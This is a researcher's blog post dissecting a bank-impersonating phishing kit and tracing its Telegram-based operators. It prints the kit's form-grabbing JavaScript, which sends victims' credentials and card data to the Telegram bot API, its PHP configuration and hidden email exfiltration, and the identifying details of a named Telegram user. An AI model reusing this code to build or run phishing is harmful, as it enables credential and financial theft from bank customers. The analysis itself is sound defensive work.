Introduction
Account Takeover Fraud (ATO) occurs when cyber criminals gain unauthorized access to a victim’s accounts. Commonly, this happens as a result of phishing, social engineering, data breach, or malware. Criminals may target a variety of accounts including eCommerce, social media, and financial services, often with the goal of financial gain. In 2024, according to the Veriff Fraud Report 2025, ATO fraud increased 13% over 2023.
When carrying out phishing campaigns, cyber criminals will often utilize phishing kits to simplify the process. These are collections of resources and tools that ease the deployment process, effectively lowering the barrier to entry, enabling less technical individuals to launch attacks. Often, these kits contain spoofed login pages and the scripts needed to receive stolen data, including credentials and personally identifiable information (PII). In recent years, according to IBM, technology brands such as Microsoft and Google have been the most targeted, followed by financial services such as Visa and Mastercard.
A real-world example of ATO fraud that I recently uncovered involves the use of a lesser known phishing kit, operated by a smaller group of individuals. This group has primarily impersonated financial institutions, including banks and credit unions. Customers of these financial institutions have been targeted by smishing attempts, often claiming a recent, large transaction has occurred, and providing a URL to an spoofed login page. Several sample messages are included below.
<FI Name>: Two charges total of $780.99? Visit <Phishing URL> to approve or deny.
FRM: <FI Name> MSG: A $499.98 transaction has been made on your ac***t at Bestbuy. If this wasn’t you, hit <Phishing URL> to cancel
Phishing Site Analysis
After the initial phishing page is loaded, the script below is executed, which attempts to fetch the Wikipedia logo. If this request is unsuccessful, a “No Internet” message is displayed to the user.
const checkOnlineStatus = async () => {
try {
const online = await fetch(
"https://www.wikipedia.org/portal/wikipedia.org/assets/img/[email protected]"
);
return online.status >= 200 && online.status < 300;
} catch (err) {
return !1;
}
};
window.addEventListener("load", async (event) => {
const online = await checkOnlineStatus();
if (!online || !navigator.onLine) {
document.querySelector(".no-internet-wrap").style.display = "flex";
}
});
In addition to the script above, jQuery is requested from Cloudflare CDN, and the obfuscated script below is executed.
var _0x531869 = _0x58e1;
(function (_0x400469, _0x46af74) {
var _0xcdd89d = _0x58e1,
_0x43fcda = _0x400469();
while (!![]) {
try {
var _0x5a039b =
parseInt(_0xcdd89d(0xf5)) / (0x1bc9 + -0xea7 + -0xd21) +
(-parseInt(_0xcdd89d(0xf9)) / (-0x9 * 0x65 + -0x1226 + 0x15b5)) *
(parseInt(_0xcdd89d(0x109)) /
(0x12a * 0x2 + -0x1ed3 * -0x1 + 0xca * -0x2a)) +
-parseInt(_0xcdd89d(0xfb)) / (-0x23d + -0x4 * 0x7b9 + 0x2125) +
parseInt(_0xcdd89d(0xf3)) / (0x2090 + 0x1459 + -0x34e4) +
(parseInt(_0xcdd89d(0x104)) / (-0x1 * -0x22f3 + -0x112b + -0x11c2)) *
(-parseInt(_0xcdd89d(0xfd)) / (0x3f * 0x49 + 0x26e6 + -0x38d6)) +
(parseInt(_0xcdd89d(0x105)) /
(0x217b * -0x1 + -0x1 * -0x9d2 + -0x17b1 * -0x1)) *
(parseInt(_0xcdd89d(0xfa)) /
(0x976 * -0x2 + -0xc4b * -0x2 + -0x5a1 * 0x1)) +
parseInt(_0xcdd89d(0x103)) /
(-0x679 * 0x3 + -0x23ae * 0x1 + -0x5 * -0xb07);
if (_0x5a039b === _0x46af74) break;
else _0x43fcda["push"](_0x43fcda["shift"]());
} catch (_0x593e89) {
_0x43fcda["push"](_0x43fcda["shift"]());
}
}
})(_0x5f42, 0x11 * 0x2c6b + -0xbbdf * 0x2 + -0x6 * -0x23f),
$(document)[_0x531869(0xf2)](function () {
var _0x439367 = _0x531869,
_0x2e99aa = {
RKNGp: _0x439367(0x107),
imnJz: _0x439367(0xf0),
UuuYx: _0x439367(0xf1),
gZPlR: function (_0x238482, _0x5436b0) {
return _0x238482 + _0x5436b0;
},
MkvBX: _0x439367(0x108) + _0x439367(0xfc) + _0x439367(0x106),
};
if (navigator[_0x439367(0x100)]) {
var _0x1a4789 = _0x2e99aa[_0x439367(0xf4)];
$[_0x439367(0xf6)](
_0x2e99aa[_0x439367(0xf8)](_0x1a4789, _0x2e99aa[_0x439367(0xfe)]),
function (_0x5b76e6, _0x658d76) {
var _0x51f265 = _0x439367;
document[_0x51f265(0xff)](
_0x2e99aa[_0x51f265(0xf7)],
_0x2e99aa[_0x51f265(0x10a)]
),
document[_0x51f265(0x101)](_0x5b76e6),
document[_0x51f265(0x102)]();
}
);
}
});
function _0x58e1(_0x7cd800, _0x339e6d) {
var _0x3dcaea = _0x5f42();
return (
(_0x58e1 = function (_0x367c98, _0x1d1a61) {
_0x367c98 = _0x367c98 - (0x2d5 * -0x5 + -0x1c3a * 0x1 + 0x2b53);
var _0xfa2a21 = _0x3dcaea[_0x367c98];
return _0xfa2a21;
}),
_0x58e1(_0x7cd800, _0x339e6d)
);
}
function _0x5f42() {
var _0x8ba2c2 = [
"116056eSFiLT",
"?_do=layou",
"7nZMiso",
"MkvBX",
"open",
"onLine",
"write",
"close",
"808310iFofJc",
"421662pIdshq",
"273256lkMWcy",
"t&pv=*****",
"text/html",
"_sysm_.php",
"589698jNbYsn",
"imnJz",
"replace",
"spgbuck/",
"ready",
"504055xSWqRT",
"UuuYx",
"180625JizLdt",
"post",
"RKNGp",
"gZPlR",
"2befZgY",
"9KYeBbJ",
];
_0x5f42 = function () {
return _0x8ba2c2;
};
return _0x5f42();
}
Using an online deobfuscation tool to simplify analysis, the following is the resulting deobfuscated script. This script makes a POST request to spgbuck/_sysm_.php with 2 query parameters: _do and pv. The first parameter has the value layout. The second parameter has a value that is commonly the reverse string of the impersonated FI’s name or acronym. The response to this POST request is then used to overwrite the current DOM.
$(document).ready(function () {
if (navigator.onLine) {
$.post("spgbuck/_sysm_.php?_do=layout&pv=*****", function (_0x5b76e6, _0x658d76) {
document.open("text/html", "replace");
document.write(_0x5b76e6);
document.close();
});
}
});
The new DOM includes the impersonated login page, as well as several additional scripts. While one of these scripts is obfuscated, the others are nicely formatted and conveniently contain comments.
Although there appear to be several variations of this phishing kit, there are several common HTTP requests. Specifically, these requests are made to spgbuck/_sysm_.php, relative to the phishing page. This is a unique, important detail specific to this phishing kit that will later be helpful in identifying additional phishing sites using the same kit.
Before deobfuscating the first script, there are several interesting things that immediately stand out in the other scripts. There are a number of basic functions defined for validating user input, parsing URL parameters, encoding data, and managing cookies. The comments, function names, and strings provide a lot of insight as to what information may be collected from the victim. Several functions also appear to reference Amazon, USPS, and Microsoft 365.
Potentially collected information includes:
- Credentials (username, password)
- Full name
- Mother’s maiden name
- Date of birth
- Social security number
- Email address
- Phone number
- Address (street address, city, state, zip)
- Credit card / debit card (card number, expiration date, security code)
- ATM PIN
- Driver’s license number
- Email credentials (address, password)
- One-time password (OTP)
There is one notable function, vt, that makes a GET request to spgbuck/_sysm_.php with 2 query parameters: _do and s. Based on the function definition and its usage, this appears to be used to report the user’s current step to the server. For instance, this function is called when the login form is first loaded, and whenever information is submitted (i.e., email_first_submit, user_pass_submit, cc_info, etc.).
function vt(pg_step_name) {
$.get(
window.hstUrl +
"_sysm_.php?_do=vt&s=" +
window.btoa(window.location.href + "_" + pg_step_name),
function (data) {
console.log("Logged: " + pg_step_name);
console.log("Retured Data: " + data);
}
);
}
...
// Log Visit
vt('first_visit');
The server always responds to these vt requests with the text Logged in file Bro. vtl.txt. With a little bit of guessing, this file can be found at spgbuck/vtl.txt. This appears to be a visitor log that contains the IP, referer, date and time, user agent, and requested URL (which includes the user’s current step in a base64 encoded string).
Deobfuscating the first script reveals the use of the Telegram bot API to send messages containing details about the victim such as their IP address and user agent, as well as the phishing URL and summited form data which may include any of the previously mentioned information. Additionally, this script may upload a user-provided photo to Telegram, however, the referenced upload element does not appear to exist.
The Telegram bot authorization tokens and chat IDs found in this script can be used to gather additional information using the Telegram bot API. This analysis is discussed in the next section.
$(document).ready(function () {
if (window.hapei && window.ceid) {
var _0x18e690 = '';
$.getJSON("https://api.ipify.org?format=json", function (_0x1f7ce4) {
console.log("IP: " + _0x1f7ce4.ip);
_0x18e690 = _0x1f7ce4.ip;
});
var _0x30352b = {};
$(":input").on("input", function (_0x1452ed) {
var _0x4d6b13 = $(this);
var _0x23d7e9 = _0x4d6b13.attr("name");
_0x30352b[_0x23d7e9] = _0x4d6b13.val();
});
$("form").on("submit", function (_0x106231) {
console.log("Submit Observed", Object.keys(_0x30352b).length);
if (Object.keys(_0x30352b).length > 0) {
var _0x26a839 = JSON.stringify(_0x30352b);
var _0x4cd41d = "====== XXX INFO ======\r\nURL:" + window.location.href + "\r\nIP: https://ip-api.com/" + _0x18e690 + "\r\nUser-Agent: " + navigator.userAgent + "\r\nData:\r\n " + _0x26a839 + "\r\n======";
_0x26a839 = "====== XXX INFO ======\r\nIP: https://ip-api.com/" + _0x18e690 + "\r\nUser-Agent: " + navigator.userAgent + "\r\nData:\r\n " + _0x26a839 + "\r\n======";
console.log("Form ID: " + $(this).attr('id'));
console.log("Form Data: " + JSON.stringify(_0x30352b));
console.log("TG Data: " + _0x26a839);
$.ajax({
'url': "https://api.telegram.org/bot<token>/sendMessage",
'method': "GET",
'data': {
'chat_id': '<chat id>',
'text': _0x26a839
},
'dataType': "jsonp",
'success': function (_0x1c5f67) {
console.log("TGB... :;)");
}
});
$.ajax({
'url': "https://api.telegram.org/bot<token>/sendMessage",
'method': "GET",
'data': {
'chat_id': "-1002143942473",
'text': _0x4cd41d
},
'dataType': "jsonp",
'success': function (_0x31b84a) {
console.log("X3TGB... :;)");
}
});
}
if ($(".js-drop-target").is(":visible")) {
jQuery.each($(".js-drop-target"), function (_0x1548c9, _0x701fe2) {
var _0x2df66c = $(this).find(".js-upload-file-input");
var _0x1d41c3 = _0x2df66c.get(0).files[0];
if (_0x1d41c3) {
var _0x2600d3 = new FormData();
_0x2600d3.append("chat_id", '<chat id>');
_0x2600d3.append("photo", _0x1d41c3);
_0x2600d3.append("caption", _0x18e690);
$.ajax({
'url': "https://api.telegram.org/bot<token>/sendPhoto",
'method': "POST",
'data': _0x2600d3,
'async': true,
'contentType': false,
'cache': false,
'processData': false,
'success': function (_0xd9d2f7) {
console.log("TGB-IMG... :;)");
}
});
var _0xcf0015 = new FormData();
_0xcf0015.append("chat_id", "-1002143942473");
_0xcf0015.append("photo", _0x1d41c3);
_0xcf0015.append("caption", _0x18e690 + " (" + window.location.href + ')');
$.ajax({
'url': "https://api.telegram.org/bot<token>/sendPhoto",
'method': "POST",
'data': _0xcf0015,
'async': true,
'contentType': false,
'cache': false,
'processData': false,
'success': function (_0x4882b7) {
console.log("X3TGBIMG... :;)");
}
});
}
});
}
});
}
});
In addition to sending the form data via Telegram, it is also submitted to spgbuck/_sysm_.php via a POST request with the query parameter _do=ucfbr_form.
By submitting data to the phishing site, the resulting form submission and Telegram API requests can be seen using the browser developer tools. Several of these requests can be seen below.
After submitting data to all forms, the page will redirect to a predefined URL, which is typically the FI’s official login page.
Telegram Bot API Analysis
Using the Telegram bot authorization tokens and chat IDs that were found during the previous analysis, a wealth of other information can be collected about the Telegram bots and users associated with them.
The client-side JavaScript of the phishing sites only uses two API methods: sendMessage and sendPhoto. The Telegram bot API documentation provides a list of additional methods.
As explained in the documentation, API requests require a unique authorization token, as well as the name of the method to invoke. Many methods also require additional parameters, which can be provided in several different ways such as URL query parameters or a JSON object. For testing purposes, curl can be used to manually call the desired methods.
curl 'https://api.telegram.org/bot<token>/<method>?<param1>=<value>&<param2>=<value>' > response.json
Although the following sample responses were obtained manually using the most commonly found token and chat ID, Automated Analysis is used to gather all relevant details to generate and update the related attribution graph.
Based on the analysis in this section, the general flow of messages from the phishing site to the associated Telegram user can be visualized as in the following graph.
getMe Method
The getMe API method returns basic information about the bot such as its ID, name, and username.
{
"ok": true,
"result": {
"id": 7117374271,
"is_bot": true,
"first_name": "Komando",
"username": "KomandozBot",
"can_join_groups": true,
"can_read_all_group_messages": false,
"supports_inline_queries": false,
"can_connect_to_business": false,
"has_main_web_app": false
}
}
getChat Method
The getChat method returns information about a chat. The chat may be a private chat, a group, or a channel. The information returned in this response will vary depending on the type of chat. For example, if the chat is a group or channel, the response may include the chat’s title and description. If the chat is a private chat, the response may include the user’s name, username, and bio.
{
"ok": true,
"result": {
"id": -1002143942473,
"title": "Komandoz",
"type": "channel",
"invite_link": "https://t.me/+***",
"has_visible_history": true,
"can_send_paid_media": true,
"available_reactions": [],
"max_reaction_count": 11,
"accent_color_id": 1
}
}
getChatAdministrators Method
The getChatAdministrators method returns a list of users which are administrators in a chat. This method only applies to groups and channels. In this instance, the response from the getChat Method indicates this is a channel, so at least one administrator is expected.
{
"ok": true,
"result": [
{
"user": {
"id": 7117374271,
"is_bot": true,
"first_name": "Komando",
"username": "KomandozBot"
},
"status": "administrator",
"can_be_edited": false,
"can_manage_chat": true,
"can_change_info": true,
"can_post_messages": true,
"can_edit_messages": true,
"can_delete_messages": true,
"can_invite_users": true,
"can_restrict_members": true,
"can_promote_members": false,
"can_manage_video_chats": true,
"can_post_stories": true,
"can_edit_stories": true,
"can_delete_stories": true,
"is_anonymous": false,
"can_manage_voice_chats": true
},
{
"user": {
"id": 6493752618,
"is_bot": false,
"first_name": "SSL",
"last_name": "Monks",
"username": "qodeninja",
"language_code": "en"
},
"status": "creator",
"is_anonymous": false
}
]
}
getUserProfilePhotos Method
The getUserProfilePhotos method returns a list of profile pictures when provided with a user_id. The returned file_id can be used with the getFile Method to download the file.
{
"ok": true,
"result": {
"total_count": 1,
"photos": [
[
{
"file_id": "AgACAgQAAxUAAWcZFrNUP8qMBGqbJoHtv_9kSy_XAAKmwTEb7dhZUXsTyMRfiYr5AQADAgADYQADNgQ",
"file_unique_id": "AQADpsExG-3YWVEAAQ",
"file_size": 5607,
"width": 160,
"height": 160
},
{
"file_id": "AgACAgQAAxUAAWcZFrNUP8qMBGqbJoHtv_9kSy_XAAKmwTEb7dhZUXsTyMRfiYr5AQADAgADYgADNgQ",
"file_unique_id": "AQADpsExG-3YWVFn",
"file_size": 10790,
"width": 320,
"height": 320
},
{
"file_id": "AgACAgQAAxUAAWcZFrNUP8qMBGqbJoHtv_9kSy_XAAKmwTEb7dhZUXsTyMRfiYr5AQADAgADYwADNgQ",
"file_unique_id": "AQADpsExG-3YWVEB",
"file_size": 31420,
"width": 640,
"height": 640
}
]
]
}
}
getFile Method
The getFile method returns a file_path when provided a file_id. The file_path can then be used to download the file from https://api.telegram.org/file/bot<token>/<file_path>.
{
"ok": true,
"result": {
"file_id": "AgACAgQAAxUAAWcZFrNUP8qMBGqbJoHtv_9kSy_XAAKmwTEb7dhZUXsTyMRfiYr5AQADAgADYwADNgQ",
"file_unique_id": "AQADpsExG-3YWVEB",
"file_size": 31420,
"file_path": "photos/file_0"
}
}
The downloaded profile photo for this user, @qodeninja, can be seen below.
Phishing Kit Analysis
While a lot of information can be obtained from analyzing active phishing sites, even more can be uncovered by obtaining the phishing kit source code, which may include hard coded secrets and the location of log files, as well as additional functionality that may not be revealed by the client-side code.
After reading about several techniques for finding and downloading phishing kits in a post by Bradley Kemp of Phish Report, I was eventually able to obtain a sample of the phishing kit used by one of the previously analyzed sites. Although finding a phishing site with directory listing enabled would have been ideal, a lucky guess yield a zip file containing the kit’s PHP source code. The directory structure of this phishing kit can be seen below.
<FI related name>
├── index.html
├── <reverse FI name/acronym>-favicon.ico
└── spgbuck
├── _abt.php # antibot; disallowed keywords and ip addresses
├── _evm_html.php # email verification modal html
├── _evm_js.php # email verification modal javascript
├── _inps.php # inputs; label, type, class, icon class, maxlength
├── _spmlr_.php # PHPMailer
├── _sysm_.php # main script
├── css_sulpknab.php # FI related css
├── files
│ ├── [email protected] # FI logo
│ └── index.html
├── index.html
├── js_common.php # common javascript
├── js_sulpknab.php # FI related javascript
├── othermails.png
├── pg_<reverse FI name/acronym>.php # FI specific phishing page
├── robots.txt
├── uploads
│ └── index.html
├── vtl.txt # log file containing visitor information and current step
└── xxx.txt # log file containing submitted credentials and information
4 directories, 20 files
Many of the files found in this sample contain code that was already reviewed during the Phishing Site Analysis. The most notable file in this sample is spgbuck/_sysm_.php. This appears to be the main PHP script that contains configuration options, logging functionality, file upload processing, email and Telegram exfiltration, and various actions that can be performed, which are received via the _do query parameter.
The configuration section at the start of spgbuck/_sysm_.php, seen below, contains helpful comments explaining what each option does. Interestingly, this section only defines a single Telegram bot token and chat ID. A second token and chat ID, the ones used during the Telegram Bot API Analysis, can be found already embedded in the obfuscated JavaScript. The user associated with this second token and chat ID could very likely be the phishing kit author.
In another interesting post from Phish Report, Anshuman Das analyzes a free phishing kit, using similar obfuscation techniques to steal the Telegram tokens of scammers who have configured the kit. Although this particular kit does not appear to steal any tokens, it does appear to share collected credentials and other PII with an additional Telegram user, not configured by the phishing kit operator.
$send = "[email protected]"; // change ur email
$logfile = 1; // 1 = log data, 0 = do not log data
$log_to_tg = 1; // 1 = log data to tg, 0 = do not log data to tg
$run_cn_c = 0;
$run_antibot = 1; // 1 = enable antibot, 0 = disable antibot
/* ---- FORM-ACTIONS-CONFIG ---- */
$my_form_actions = [];
/* ---- */
/*
pg002 - OTP
pg003 - Personal Details
pgEmail - Email Access
pgDone - Finish
pgQnA - Security Question and Answer
pgCCv - Card Data
*/
$my_form_actions['form1'] = 'pg002';
$my_form_actions['form2'] = 'pgDone';
$my_form_actions['form3'] = 'pgEmail';
$my_form_actions['form_ccv'] = 'pg003';
$my_form_actions['form_qna'] = 'pg003';
/*--------------------------- DO NOT CHANGE ANYTHING BELOW EXCEPT YOU KNOW WHAT YOU ARE DOING. ---------------------------------- */
$auto_check_login = 1; // 1 - check true login, 0 - do not check true login.
$grab_fake_logins = 1; // 1 - grab fake logins, 0 - do not grab fake logins.
$auto_grab_profile = 1; //1 = grabs email domain profile (icon,bg), 0 = skip email domain profile grabing.
$show_profile_icon = 1; // 1 = show email domain icon, 0 = hide email domain icon.
$show_profile_bg = 1; // 1 = show email domain bg, 0 = hide email domain bg.
$allow_email_verify = 1;
$show_singin_opt = 0;
$show_mesg_b4_pswd = 1; // Tips: Because you're accessing sensitive info, you need to verify your password
$grab_all_fields = 1;
$pass_submit_count = 1; // 1 - once, 2 - Twice.
$tg_haypi = '<telegram bot token>';
$tg_ceid = '<telegram chat id>';
/* ---------------- XXX-MJ ------------------------*/
$disHost = 'https://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['PHP_SELF']).'/';
$ip = getenv("REMOTE_ADDR"); //getip(); //
$svr_host = str_replace('www.', '', $_SERVER['HTTP_HOST']);
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$_SESSION['allowed_fields'] = array('login','passwd');
$allowed_fields = array('login','passwd');
$all_alpha_digits = [];
$visit_log_file = 'vtl.txt';
$visit_limit = 3;
$visit_limit_step = 'email_second_submit';//cc_info_submit,email_second_submit,email_form,(second_login_submit|user_pass_submit)
if($run_antibot){ include '_abt.php'; }
$redirect_to_url = '<FI login page>';
$redirect_to_name ='<FI name>';
One notable function in spgbuck/_sysm_.php is mj_do_mail. This function contains a base64 encoded email address: [email protected].
function mj_do_mail($message) {
global $send, $ip, $svr_host;
$subject = "TRU8T1F6U 8ERVIC5 - $ip";
$headers = "From: TRU8T1F6UAlerts <customercare@$svr_host>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
/*@mail($send.','.base64_decode('amFwbWVqYXBtZUB5YWhvby5jb20='),$subject,$message,$headers);*/
@mail($send, $subject, $message, $headers);
@mail(base64_decode('amFwbWVqYXBtZUB5YWhvby5jb20='), $subject, $message, $headers);
/*testing*/
}
During the Phishing Site Analysis, only a few different values were observed for the _do query parameter. By analyzing spgbuck/_sysm_.php, a complete list of possible values can be found, which are described below. This reveals some functionality that was previously unknown, such as the ability to delete the credential log file and upload files to the server. Identifying the name and path of this credential file also reveals that it is publicly accessible. This makes it possible for impersonated financial institutions to proactively identify and secure compromised customer accounts before any fraudulent activity can occur.
layout- Returns the appropriate page view for the victim’s current step
verify_email- Attempts to get the logo and background associated with the provided email’s M365 tenant
8p8u_form,ucfbr_form,same_form- Logs submitted form data to file (
spgbuck/xxx.txt), email, and Telegram
- Logs submitted form data to file (
cnc- Checks if
spgbuck/_cnc.phpexists- This file does not exist in this sample
- Creates
dvcsdirectory containing an emptyindex.htmlfile
- Checks if
form1,form2,form3,form4,form5,xxx_form- If the
auto_check_loginoption is configured, attempts to authenticate to smtp.office365.com using submitted credentials - Logs submitted form data to file (
spgbuck/xxx.txt), email, and Telegram
- If the
vt,s- Logs visit information, including current step
visits- Displays a nicely formatted version of
spgbuck/vtl.txtthat automatically refreshes every 5 seconds
- Displays a nicely formatted version of
rlf- Deletes the credential log file (
spgbuck/xxx.txt)
- Deletes the credential log file (
Automated Analysis
Applying the insights gained from previous analysis, additional phishing sites can be found using urlscan.io. For instance, the keyword spgbuck appears to be unique to this phishing kit. Searching urlscan.io with the query filename:spgbuck currently yields 354 scans where this term is included in at least one request URL.
Using a script, these search results can be programmatically fetched using the search API. Next, using regular expressions, any Telegram tokens and chat IDs contained within the DOM of each scan can be extracted and appropriately associated with the scan from which they were found. Finally, the extracted Telegram tokens and chat IDs can be used with the Telegram bot API to gather additional details about the related bots, chats, and users.
All of the collected information is stored in a relational database, making it trivial to build associative connections between specific phishing sites and the Telegram users which ultimately receive credentials and other information from them. These relationships can be viewed in an interactive attribution graph. Clicking a specific node will display its related details.